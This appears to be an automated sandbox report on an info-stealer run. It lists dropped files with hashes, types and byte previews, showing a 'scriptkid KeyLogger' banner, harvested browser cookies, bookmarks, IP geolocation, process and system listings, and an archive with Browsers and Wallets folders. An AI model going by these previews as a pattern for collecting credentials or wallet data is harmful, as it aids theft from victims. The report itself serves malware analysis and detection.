                                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:qn:qn
                                                                                                                                                                                                                                        MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                        SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                        SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                        SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:blat
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):452344
                                                                                                                                                                                                                                        Entropy (8bit):7.997816292350483
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:12288:zT69nu5OZmTtds5tRgwa8fC4XdkAPWX4r4V+WXMZDB2Rtq:f6VuNt6tRgLxYdkzX4r4rXcB2Pq
                                                                                                                                                                                                                                        MD5:DC5EC863C04345327D2AE8FED55209B6
                                                                                                                                                                                                                                        SHA1:B23F36E0760FC11ED01294FD6DC767F44B35AC65
                                                                                                                                                                                                                                        SHA-256:3D498D4E145E38D7A4A65C230DC0E8240CB3CC8187C0A249EFE6FAA6B9509DCF
                                                                                                                                                                                                                                        SHA-512:5D9DC63E0AD2755714646E807AB248CED24E40743EAE4094F1B7378AF5DE0DC74E72C18DE38444655CA9EE4CEADEB10888A920BFE6E6D5A55BCECE2AAF1F09EC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK.........%oY................Browsers/PK.........%oY................Wallets/PK.........%oY...T............Display (1).pngl.gTS]....4..*5@0....KBQ.(A:..........."..T..M@@...#EDJ........s.3...3.7.d..w.....:g.....8...6..z.!.`<E...)Z...a....u..|.qK....,..NNer..........%.>...Akk...,.2..6'..M4..Z)S.Hwi.q..Ce.a.GW7Gc.Je.@+.?#4...c]......Q...pU.....S.S...iN...d..U+....'3.........J.A0t!:.o...c..cNyy.....I.....Cr.G.....n..uf.e.Zq=r.=_E?.3.y.AB.0..j.ha..c...n..^..g.$5...W.R;)..........%O...>..[.U..T........Jd^@..R....#r.#.&...u...a....c.2q..........S....~<..j......Uu....oi.*by.8j.$Q+..N..%`s~e..X...V.....`..l|i......_).OQ..\.9..+.=w..../;j.d_..I........=$]...a......k..v...3....r...j.... I....{...J.~...7.n.^~8@.b.....*.Oc...z......D.v......6...&.C.U.[.|...U.&A...BR._...._l.o..V...>.C.3N>lRc......h..D...6uZ...d...$..`...U<o.S#..).c`...O...N.o.R.>..Fe{..=...".....7...\k.C.....{.4G../....;...5R..v...l.e$U.%k(.....M..c3.q..yc2+?vB......D....h..oj...I
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):454
                                                                                                                                                                                                                                        Entropy (8bit):5.6874199989023495
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:4DIn6FMpJ+EVm3rY2bxbyv3r44NjIqbu1YIqyRHXmagzyCAuiDOq0pxjbIv:4Q6FMn+7JbI74ku1YIqimlFtqOTxjcv
                                                                                                                                                                                                                                        MD5:A305ABA9B0C0D2447627EBB1E90DBEDB
                                                                                                                                                                                                                                        SHA1:3941F7CE1798FA5621F81FEBB856BCC274F4346C
                                                                                                                                                                                                                                        SHA-256:80E3063ACBBC996F08471B341DF5B874C260FB696BA1E7A01B004D9041309B9D
                                                                                                                                                                                                                                        SHA-512:1D6269924EE1702B0C1CD23A34766FDB7DB8A9891684B0C410A37161D28BFA60FE0A59323841B6690F5E0BB0D657833E103B6B34B8E9778A49628F7B16EB3617
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================...google.com.TRUE./.FALSE.13343565070843817.1P_JAR.2023-10-05-09...google.com.TRUE./.FALSE.13356784270843860.NID.511=lfE2Vn6ILT7VijDzEeQ7E2-WcCFI3koiTt40Tat-ZoveQCzLQNIH_rXzfWB54vEWybmaNRxITXOcCnjhl2RsSuhlZev-zYHRHJAkTOSXgQ4rpQpZHRrNCKlp2Q4N2yfvnVbdmOY5S4gOBWPvZrZOiPLdLoEjpjyr1IKWdaFiwQo..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):683
                                                                                                                                                                                                                                        Entropy (8bit):5.025722530126248
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:4Q6FMn0FNO493sMwH493szwvaacAhZmK17ob47L47iLJ2D1fEH8mPq7D7m:4AULxsMTxsaDBLsCQEwnm
                                                                                                                                                                                                                                        MD5:282341C08A6023A1619141350A9230A0
                                                                                                                                                                                                                                        SHA1:7245389D913F4C7908962FBDFF82F1D182486990
                                                                                                                                                                                                                                        SHA-256:2790732791977585173A475A7269D1878F30EAB21837277C711B5D8CF0C1E028
                                                                                                                                                                                                                                        SHA-512:D6C635E559BCBEFEAFCA1B90D95D42D2B957A3AF7B385302ED66D19DEEC9E891B9D423FBFA4BD409C656F4E8838DE2D488A884FD88CC9866F74AE14A1382ACED
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================..1: https://support.mozilla.org/products/firefox..2: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..3: https://www.mozilla.org/contribute/..4: https://www.mozilla.org/about/..5: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaign=new-users&utm_content=-global..6: https://www.mozilla.org/privacy/firefox/..7: https://www.mozilla.org/en-US/privacy/firefox/..
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):453052
                                                                                                                                                                                                                                        Entropy (8bit):7.922137868500332
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:nkT+A4xFQVV6XsQ0PWgX+c19Gvq2SqH66z8CwpvsOz:nk8xFO4XsQ0eE+cWvq2SQ6dCK
                                                                                                                                                                                                                                        MD5:99360CEB87C585DCD4AAC6F260DD115C
                                                                                                                                                                                                                                        SHA1:43514D3105A9041E840EFC1C7106CE4C33602BAF
                                                                                                                                                                                                                                        SHA-256:58C184BD21EEE5D9BAB92A33A12C45918100C688B8B407057E2AB323AEE1AE6E
                                                                                                                                                                                                                                        SHA-512:08A2401E0AB1551BD6A3C145A3E90EB44C693D4259BC6F5B8C5994E8CFEFE6B425F5C77AE926CC1932BF0EF0CF5FBC1AE6A7B268B2969648EA3D2F98C835CA85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]....S...=s.o.3mf:b.D.i3...+.G....'A...Eyo)G#z....VR.2...%....t..#...h$.._...Z'k.Wu...B....re.}N...{.js...eS.66!......^s^oK..vQ..Q.L...]...p.k.(.......%#.......n..s^M.W..h.n..=<jg.2,...............u..w.x.%.S.-.;e..O^.....'...6.kj'...N.G.+..I....E.1/.,?|.....|W.e..j...\E..V...>7..Q...;".....C..[.T.}.....SC....%OtD..F.....?..+..|9...;.}).........Bk.|1.Wl.>.hK.?....G...).........G.y...c...P..X.q...S.....*..xp.v.R..".._..~..0f....?|E....SK....>..1.cc.`.......OD.[..q...q....3.......{.0.<..Y....eUl.'...f.=.]..../A_...`...\.b..]....s....8(^..%.o.}.~..P..Q...wH....X.O;..eaB.....b..8.b...4.?.S.oajm./^.6.8...q.{@..q.~qn...>.........}c....?../...P.k~j.......D.>.B}.{+....b[..7v...1...F.ZZb...u\..c...Z....w....^.&..s....{....}..N..qO....lB....y....q.i..S..}S.N.q{.....O....s.a......b-...q.875....c........uc....q..{..<.l>.....nw...w..ru=....=.....9!.h.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):275
                                                                                                                                                                                                                                        Entropy (8bit):4.771733771688554
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:4DIn6FMpJ+EVeAFUN3Dk96ZnXEn54deMWo:4Q6FMn22UN3Dks1Un5T4
                                                                                                                                                                                                                                        MD5:B016933917CEE587F520C3D81CF4E0EB
                                                                                                                                                                                                                                        SHA1:3DE408E609F426B21DAAABA904A46C8A460C223C
                                                                                                                                                                                                                                        SHA-256:FD5E68B9B03CDC24ABC7CD685C0C2A49B2C8B61E94F8D3EAC23EC2103B657340
                                                                                                                                                                                                                                        SHA-512:45F15DCC8D1F32F4F6F7067364587D2DBBBA3B94AC00BE6266C07E377236D3532ABBC63A16E19DA4E9775530FA9D47532313C01629EF5F8EFAF4C91C95112D48
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================..173.254.250.89..United States..Killeen..America/Chicago..QuadraNet OMGITSFAST AS8100 QuadraNet Enterprises LLC
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25254
                                                                                                                                                                                                                                        Entropy (8bit):4.629387689350764
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ATiXIZbULeUTj7+PiWtnQq1Bygk/rSb4ndJNuGnI+3HJgA5Pq/aVNChYPqMvsAfc:LsZTYxPnzc1
                                                                                                                                                                                                                                        MD5:45305AFE4C16849799D9D7B9372CF4F3
                                                                                                                                                                                                                                        SHA1:FBA1107FA2D8F6EFE4D19B843BEF937F9109FC6A
                                                                                                                                                                                                                                        SHA-256:3C069EEF7713B8ED30435CF337FA9BA923318D96AFDD30A9A64C09B9290147ED
                                                                                                                                                                                                                                        SHA-512:8DA7DDEB9DAA86AE360160172B03886459F1304A2859DAB9E4EA8B428578469116D487D577010B1D6C6B7B62A91044C2E92AA56DEC9CF240DB7656365665BBAB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 180 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 82'856 K......Image Name: smss.exe...PID: 324...Session Name: Services...Session#: 0...Mem Usage: 1'240 K......Image Name: csrss.exe...PID: 408...Session Name: Services...Session#: 0...Mem Usage: 5'252 K......Image Name: wininit.exe...PID: 484...Session Name: Services...Session#: 0...Mem Usage: 7'236 K......Image Name: csrss.exe...PID: 492...Session Name: Console...Session#: 1...Mem Usage: 5'980 K......Image Name: winlogon.e
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:Algol 68 source, Unicode text, UTF-8 text, with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143771
                                                                                                                                                                                                                                        Entropy (8bit):4.361348789395363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9i6oZBeX+DlX7z8oiEmi+B1HJXXaaTsB8xOQiG5rtGl2ynreAqUfI+AB8Pn6ygZH:9i69gLm
                                                                                                                                                                                                                                        MD5:7AE7C3CE86A51B2CC754AF2056D3215F
                                                                                                                                                                                                                                        SHA1:7726A9498F6A303895F86558BCFEFA0B3DD89CB6
                                                                                                                                                                                                                                        SHA-256:5CCC10BE816201008C706E081DBFCBF82E4E018F92EAAC18FB8D4B7FAD14F66A
                                                                                                                                                                                                                                        SHA-512:5D2D5FD33D3C47DD637A456DEB696AA78E51891DE225160373A05BCB4184F32F37A10301BDC9939FBCDBAD3A9C58AF99D714B7973F105162DD85F3095121FC82
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....... scriptkid KeyLogger . https://scriptkid.lol | .........======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71380-43655-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 12:29:46...System Manufacturer: 2352sH8Ugu3bnXf...System Model: C6Ykckwy...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.1211596417522893
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                                                                                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                                                                                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                                                                                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                                                                                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Nov 15 10:56:30 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1372
                                                                                                                                                                                                                                        Entropy (8bit):4.11411649177469
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:HREFq9movp+bTH1WwKjFytdNII+ycuZhN3akS5PNnqS+d:eT4EbT/KjUtdu1ul3a37qSe
                                                                                                                                                                                                                                        MD5:C848872ECFF1977DE4C441EF7DD1B883
                                                                                                                                                                                                                                        SHA1:5FCF6135678551183737333FE3BFC1C41725EC17
                                                                                                                                                                                                                                        SHA-256:160AB8C242F1F7BEC828B983E9EE82E8334E777C96B0CDC762D7AE96209FDC3B
                                                                                                                                                                                                                                        SHA-512:B03B641FBEECCB424CEDE57BF87088D15A7457CCCBC948C79A130A48A24C9748DD2D966CEE83737AE4B0B2B2C04F5D76447C2F0A5F8219E5E564D0C74C4C3E14
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L....(7g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........P....c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP................yj.......7.t.............3.......C:\Users\user\AppData\Local\Temp\RES6BB9.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\88AE2742-2B8C-0221-A586-225B8451ACF0.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.j.h.g.m.e.x.2...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.1211596417522893
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                                                                                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                                                                                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                                                                                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                                                                                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13747712
                                                                                                                                                                                                                                        Entropy (8bit):7.99601949446881
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:393216:85CCDJlS/FyOUUGafnbRngsndGKLYHSJj:8oCytjGafSsdx4k
                                                                                                                                                                                                                                        MD5:4FD34971F2551E33806360BA5EE86E5E
                                                                                                                                                                                                                                        SHA1:A3F2FE7D770D45C0B98BDBDF3322614582E41D59
                                                                                                                                                                                                                                        SHA-256:E82FE9CE4FEC710C6F02DC3ED738E5A88955D4D938957EC2B49119D5018ECB81
                                                                                                                                                                                                                                        SHA-512:1C01226CB0A061675A8AF6DB24DEA570881BBD7A2D6C8E21AAF51884BF4B64A2011DCC881507FB0B0A0191F8DC180831833EB175F07D6FDEE72ED11748183281
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................U.........&W.....&......&......&...............!......!.....Rich...........PE..d...Bs6g.........."....(.......................@..........................................`.....................................................<....0..............................@...................................@............................................text............................... ..`.rdata..............................@..@.data...`...........................@....pdata..............................@..@.rsrc........0......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
